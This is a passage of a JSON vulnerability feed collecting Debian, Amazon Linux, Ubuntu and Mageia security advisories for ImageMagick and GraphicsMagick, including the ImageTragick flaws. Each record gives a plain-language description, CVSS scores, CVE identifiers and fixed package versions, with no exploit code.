These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code\n([CVE-2016-3714](https://security-tracker.debian.org/tracker/CVE-2016-3714)), make HTTP\nGET or FTP requests ([CVE-2016-3718](https://security-tracker.debian.org/tracker/CVE-2016-3718)),\nor delete ([CVE-2016-3715](https://security-tracker.debian.org/tracker/CVE-2016-3715)), move\n([CVE-2016-3716](https://security-tracker.debian.org/tracker/CVE-2016-3716)), or read\n([CVE-2016-3717](https://security-tracker.debian.org/tracker/CVE-2016-3717)) local files.\n\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full removal of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 8:6.8.9.9-5+deb8u2.\n\n\nWe recommend that you upgrade your imagemagick packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-16T00:00:00", "type": "osv", "title": "imagemagick - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-5239"], "modified": "2022-07-21T05:49:05", "id": "OSV:DSA-3580-1", "href": "https://osv.dev/vulnerability/DSA-3580-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-05T05:18:05", "description": "\nA remote denial of service vulnerability has been discovered in\ngraphicsmagick, a collection of image processing tools and associated\nlibraries.\n\n\nA specially crafted file can be used to produce a heap-based buffer\noverflow and application crash by exploiting a defect in the\nAcquireCacheNexus function in magick/pixel\\_cache.c.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n1.3.16-1.1+deb7u14.\n\n\nWe recommend that you upgrade your graphicsmagick packages.\n**Note**: The previous graphicsmagick package inadvertently introduced a\ndependency on liblcms2-2. This version of the package returns to using\nliblcms1. 
If your system does not otherwise require liblcms2-2, you\nmay want to consider removing it following the graphicsmagick upgrade.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-11-10T00:00:00", "type": "osv", "title": "graphicsmagick - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16669"], "modified": "2022-08-05T05:18:02", "id": "OSV:DLA-1168-1", "href": "https://osv.dev/vulnerability/DLA-1168-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:13:32", "description": "\nSeveral security vulnerabilities were discovered in graphicsmagick a\ntool to manipulate image files.\n\n\nGraphicsMagick is a fork of ImageMagick and also affected by\nvulnerabilities collectively known as ImageTragick, that are the\nconsequence of lack of sanitization of untrusted input. 
An attacker\nwith control on the image input could, with the privileges of the user\nrunning the application, \nexecute code \n([CVE-2016-3714](https://security-tracker.debian.org/tracker/CVE-2016-3714)), \nmake HTTP GET or FTP requests \n([CVE-2016-3718](https://security-tracker.debian.org/tracker/CVE-2016-3718)), \nor delete \n([CVE-2016-3715](https://security-tracker.debian.org/tracker/CVE-2016-3715)), \nmove\n([CVE-2016-3716](https://security-tracker.debian.org/tracker/CVE-2016-3716)), \nor read \n([CVE-2016-3717](https://security-tracker.debian.org/tracker/CVE-2016-3717)), \nlocal files.\n\n\nTo address these concerns the following changes have been made:\n\n\n1. Remove automatic detection/execution of MVG based on file header or\n file extension.\n2. Remove the ability to cause an input file to be deleted based on a\n filename specification.\n3. Improve the safety of delegates.mgk by removing gnuplot support,\n removing manual page support, and by adding -dSAFER to all\n ghostscript invocations.\n4. Sanity check the MVG image primitive filename argument to assure\n that \"magick:\" prefix strings will not be interpreted. Please note\n that this patch will break intentional uses of magick prefix\n strings in MVG and so some MVG scripts may fail. 
We will search\n for a more flexible solution.\n\n\nIn addition the following issues have been fixed:\n\n\n* [CVE-2015-8808](https://security-tracker.debian.org/tracker/CVE-2015-8808)\nAssure that GIF decoder does not use uninitialized data and cause an\n out-of-bound read.\n* [CVE-2016-2317](https://security-tracker.debian.org/tracker/CVE-2016-2317) and\n [CVE-2016-2318](https://security-tracker.debian.org/tracker/CVE-2016-2318)\nVulnerabilities that allow to read or write outside memory bounds\n (heap, stack) as well as some null-pointer dereferences to cause a\n denial of service when parsing SVG files.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n1.3.16-1.1+deb7u1.\n\n\nWe recommend that you upgrade your graphicsmagick packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-21T00:00:00", "type": "osv", "title": "graphicsmagick - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8808", "CVE-2016-2317", "CVE-2016-2318", "CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-5239"], "modified": "2022-07-21T05:54:27", "id": "OSV:DLA-484-1", "href": "https://osv.dev/vulnerability/DLA-484-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2021-07-29T02:05:45", "description": "**Issue Overview:**\n\nA possible heap overflow was discovered in the EscapeParenthesis() function (CVE-2016-7447).\n\nVarious issues were found in the processing of SVG files in GraphicsMagick (CVE-2016-7446).\n\nThe TIFF reader had a bug pertaining to use of TIFFGetField() when a 'count' value is returned. The bug caused a heap read overflow (due to using strlcpy() to copy a possibly unterminated string) which could allow an untrusted file to crash the software (CVE-2016-7449).\n\nThe Utah RLE reader did not validate that header information was reasonable given the file size and so it could cause huge memory allocations and/or consume huge amounts of CPU, causing a denial of service (CVE-2016-7448)\n\n \n**Affected Packages:** \n\n\nGraphicsMagick\n\n \n**Issue Correction:** \nRun _yum update GraphicsMagick_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 GraphicsMagick-c++-devel-1.3.25-1.9.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-devel-1.3.25-1.9.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-1.3.25-1.9.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-c++-1.3.25-1.9.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-perl-1.3.25-1.9.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-debuginfo-1.3.25-1.9.amzn1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 GraphicsMagick-doc-1.3.25-1.9.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 GraphicsMagick-1.3.25-1.9.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 GraphicsMagick-c++-1.3.25-1.9.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-1.3.25-1.9.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-perl-1.3.25-1.9.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-c++-devel-1.3.25-1.9.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-devel-1.3.25-1.9.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-debuginfo-1.3.25-1.9.amzn1.x86_64 \n \n \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-12T17:00:00", "type": "amazon", "title": "Medium: GraphicsMagick", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, 
"impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7449"], "modified": "2016-10-12T17:00:00", "id": "ALAS-2016-752", "href": "https://alas.aws.amazon.com/ALAS-2016-752.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-07-25T19:25:09", "description": "**Issue Overview:**\n\nMemory information disclosure in DescribeImage function in magick/describe.c \nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in the DescribeImage function of the magick/describe.c file, because of a heap-based buffer over-read. The portion of the code containing the vulnerability is responsible for printing the IPTC Profile information contained in the image. This vulnerability can be triggered with a specially crafted MIFF file. There is an out-of-bounds buffer dereference because certain increments are never checked. (CVE-2017-16353 )\n\nGraphicsMagick 1.3.26 has double free vulnerabilities in the ReadOneJNGImage() function in coders/png.c (CVE-2017-11139)\n\nIn GraphicsMagick there is a stack-based buffer over-read in WriteWEBPImage in coders/webp.c, related to an incompatibility with libwebp versions, 0.5.0 and later, that use a different structure type. (CVE-2017-17913)\n\nIn GraphicsMagick 1.3.27, there is an infinite loop and application hang in the ReadBMPImage function (coders/bmp.c). Remote attackers could leverage this vulnerability to cause a denial of service via an image file with a crafted bit-field mask value. (CVE-2018-5685)\n\nThe ReadJPEGImage function in coders/jpeg.c in GraphicsMagick 1.3.26 creates a pixel cache before a successful read of a scanline, which allows remote attackers to cause a denial of service (resource consumption) via crafted JPEG files. 
(CVE-2017-11140)\n\nIn GraphicsMagick 1.3.26, an allocation failure vulnerability was found in the function ReadMNGImage in coders/png.c when a small MNG file has a MEND chunk with a large length value. (CVE-2017-13147)\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteCMYKImage() function in coders/cmyk.c when processing multiple frames that have non-identical widths. (CVE-2017-11643)\n\nGraphicsMagick 1.3.26 has a Memory Leak in the PersistCache function in magick/pixel_cache.c during writing of Magick Persistent Cache (MPC) files. (CVE-2017-11641)\n\nIn GraphicsMagick there is a heap-based buffer over-read in ReadMNGImage in coders/png.c, related to accessing one byte before testing whether a limit has been reached. (CVE-2017-17915)\n\nIn GraphicsMagick 1.3.27a, there is a buffer over-read in ReadPALMImage in coders/palm.c when QuantumDepth is 8. (CVE-2017-17783)\n\nIn GraphicsMagick 1.3.27a, there is a heap-based buffer over-read in ReadOneJNGImage in coders/png.c, related to oFFs chunk allocation. (CVE-2017-17782)\n\ncoders/wpg.c in GraphicsMagick 1.3.26 allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted file, related to the AcquireCacheNexus function in magick/pixel_cache.c. (CVE-2017-16669)\n\nIn GraphicsMagick there is a heap-based buffer over-read in ReadNewsProfile in coders/tiff.c, in which LocaleNCompare reads heap data beyond the allocated region. (CVE-2017-17912)\n\nThe ReadOneJNGImage function in coders/png.c in GraphicsMagick 1.3.26 allows remote attackers to cause a denial of service (application crash) during JNG reading via a zero-length color_image data structure. (CVE-2017-11102)\n\nGraphicsMagick 1.3.26 has a NULL pointer dereference in the WritePCLImage() function in coders/pcl.c during writes of monochrome images. 
(CVE-2017-11637)\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteRGBImage() function in coders/rgb.c when processing multiple frames that have non-identical widths. (CVE-2017-11636)\n\n \n**Affected Packages:** \n\n\nGraphicsMagick\n\n \n**Issue Correction:** \nRun _yum update GraphicsMagick_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 GraphicsMagick-c++-1.3.28-1.12.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-1.3.28-1.12.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-devel-1.3.28-1.12.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-perl-1.3.28-1.12.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-debuginfo-1.3.28-1.12.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-c++-devel-1.3.28-1.12.amzn1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 GraphicsMagick-doc-1.3.28-1.12.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 GraphicsMagick-1.3.28-1.12.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 GraphicsMagick-c++-1.3.28-1.12.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-devel-1.3.28-1.12.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-perl-1.3.28-1.12.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-debuginfo-1.3.28-1.12.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-c++-devel-1.3.28-1.12.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-1.3.28-1.12.amzn1.x86_64 \n \n \n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-07T21:35:00", "type": "amazon", "title": "Important: GraphicsMagick", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11641", "CVE-2017-11643", "CVE-2017-13147", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915", "CVE-2018-5685"], "modified": "2018-03-08T22:17:00", "id": "ALAS-2018-966", "href": "https://alas.aws.amazon.com/ALAS-2018-966.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-25T19:28:23", "description": "**Issue Overview:**\n\nIt was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application. (CVE-2016-3714)\n\nIt was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\nA server-side request forgery flaw was discovered in the way ImageMagick processed certain images. 
A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.\n\n \n**Affected Packages:** \n\n\nImageMagick\n\n \n**Issue Correction:** \nRun _yum update ImageMagick_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 ImageMagick-doc-6.7.8.9-13.19.amzn1.i686 \n \u00a0\u00a0\u00a0 ImageMagick-perl-6.7.8.9-13.19.amzn1.i686 \n \u00a0\u00a0\u00a0 ImageMagick-c++-6.7.8.9-13.19.amzn1.i686 \n \u00a0\u00a0\u00a0 ImageMagick-6.7.8.9-13.19.amzn1.i686 \n \u00a0\u00a0\u00a0 ImageMagick-debuginfo-6.7.8.9-13.19.amzn1.i686 \n \u00a0\u00a0\u00a0 ImageMagick-devel-6.7.8.9-13.19.amzn1.i686 \n \u00a0\u00a0\u00a0 ImageMagick-c++-devel-6.7.8.9-13.19.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 ImageMagick-6.7.8.9-13.19.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 ImageMagick-debuginfo-6.7.8.9-13.19.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ImageMagick-6.7.8.9-13.19.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ImageMagick-c++-6.7.8.9-13.19.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ImageMagick-devel-6.7.8.9-13.19.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ImageMagick-c++-devel-6.7.8.9-13.19.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ImageMagick-doc-6.7.8.9-13.19.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ImageMagick-perl-6.7.8.9-13.19.amzn1.x86_64 \n \n \n", "edition": 2, "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-11T11:00:00", "type": "amazon", "title": "Important: ImageMagick", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-11T11:00:00", "id": "ALAS-2016-699", "href": "https://alas.aws.amazon.com/ALAS-2016-699.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2022-01-04T11:30:49", "description": "It was discovered that GraphicsMagick incorrectly handled certain image files. 
\nAn attacker could possibly use this issue to cause a denial of service or other \nunspecified impact.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-01-22T00:00:00", "type": "ubuntu", "title": "GraphicsMagick vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-17500", "CVE-2017-17501", "CVE-2017-16547", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17498", "CVE-2017-17783", "CVE-2017-17782", "CVE-2017-16669", "CVE-2017-16545"], "modified": "2020-01-22T00:00:00", "id": "USN-4248-1", "href": "https://ubuntu.com/security/notices/USN-4248-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-04T11:31:58", "description": "It was discovered that GraphicsMagick incorrectly handled certain image files. 
\nAn attacker could possibly use this issue to cause a denial of service or other \nunspecified impact.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-16T00:00:00", "type": "ubuntu", "title": "GraphicsMagick vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11638", "CVE-2017-12936", "CVE-2017-13737", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-12937", "CVE-2017-13776", "CVE-2017-13777", "CVE-2017-13065", "CVE-2017-11642", "CVE-2017-11641", "CVE-2017-11643", "CVE-2017-12935", "CVE-2017-13775", "CVE-2017-13134"], "modified": "2019-12-16T00:00:00", "id": "USN-4222-1", "href": "https://ubuntu.com/security/notices/USN-4222-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-04T12:26:55", "description": "Nikolay Ermishkin and Stewie discovered that ImageMagick incorrectly \nsanitized untrusted input. A remote attacker could use these issues to \nexecute arbitrary code. These issues are known as \"ImageTragick\". This \nupdate disables problematic coders via the /etc/ImageMagick-6/policy.xml \nconfiguration file. 
In certain environments the coders may need to be \nmanually re-enabled after making sure that ImageMagick does not process \nuntrusted input. (CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, \nCVE-2016-3717, CVE-2016-3718)\n\nBob Friesenhahn discovered that ImageMagick allowed injecting commands via \nan image file or filename. A remote attacker could use this issue to \nexecute arbitrary code. (CVE-2016-5118)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-06-02T00:00:00", "type": "ubuntu", "title": "ImageMagick vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3716", "CVE-2016-5118", "CVE-2016-3714", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-3715"], "modified": "2016-06-02T00:00:00", "id": "USN-2990-1", "href": "https://ubuntu.com/security/notices/USN-2990-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "A possible heap overflow of the EscapeParenthesis() function (CVE-2016-7447). 
The Utah RLE reader did not validate that header information was reasonable given the file size and so it could cause huge memory allocations and/or consume huge amounts of CPU (CVE-2016-7448). The TIFF reader had a bug pertaining to use of TIFFGetField() when a 'count' value is returned. The bug caused a heap read overflow (due to using strlcpy() to copy a possibly unterminated string) which could allow an untrusted file to crash the software (CVE-2016-7449). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-09-28T05:59:24", "type": "mageia", "title": "Updated graphicsmagick packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", 